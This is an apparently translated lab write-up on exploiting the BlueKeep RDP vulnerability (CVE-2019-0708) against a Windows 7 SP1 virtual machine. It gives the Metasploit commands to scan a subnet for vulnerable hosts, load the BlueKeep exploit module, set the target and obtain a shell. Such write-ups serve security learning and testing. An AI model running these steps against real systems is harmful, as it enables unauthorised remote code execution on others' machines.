.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
Vulnerability Introduction
On May 14, 2019, Microsoft officially released a security patch to fix a remote code execution vulnerability for Windows Remote Desktop Services, which affected some older versions of Windows systems. This vulnerability is pre-authentication and requires no user interaction, which means that the vulnerability can be exploited through a network worm. Any malware exploiting this vulnerability can spread from infected computers to other vulnerable computers in a similar way to the 2017 WannaCry malware spread.
As soon as Microsoft's official news came out, major security manufacturers began to issue vulnerability warnings. During that time, I was looking for the corresponding POC, but either it was a POC that could not be used, or it was a POC written in the previous vulnerabilities, and even more so I clicked on attack to surprise you.
Shooting Range Environment
Vulnerability environment, I was the system with Windows 7 SP1 installed on the virtual machine at that time.
001 Use VM to install Windows 7 SP1 to simulate the victim machine
Windows7 SP1 download link (the target machine here is a system that uses win7sp1 provided by cousin Qingshui) : Thunder download ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/Cloud disk download: Windows7 X64 download link: link : https://pan.baidu.com/s/1A_b2PCbzInKx3hMkUz1xUg Extraction code : fiwx
002 msf configuration
Download cve_2019_0708_bluekeep_rce.rb to msf's configuration file /usr/share/metasploit-framework/modules/exploits/windows/rdp
Scan the host with vulnerability
msfconsole
search 0708 #Scan the available modules
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep #Load the scan module
set RHOSTS 192.168.1.1/24 #Set the scan address pool
run
As shown in the figure, you can scan to see that there is a device 192.168.1.8 in the current network segment that has this vulnerability.
Vulnerability Exploit
Use msf attack
When using msf attack, you need to pay attention to configuring the two parameters of RHOSTS and target
msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS 192.168.1.8
set target 2 (the current target machine is a virtual machine installed win7)
run successfully gets shell target parameter Exploit target:
Id Name
-- ----
1 Windows 7 SP1/2008 R2 (6.1.7601 x64)
2 Windows 7 SP1/2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1/2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1/2008 R2 (6.1.7601 x64 - Hyper-V)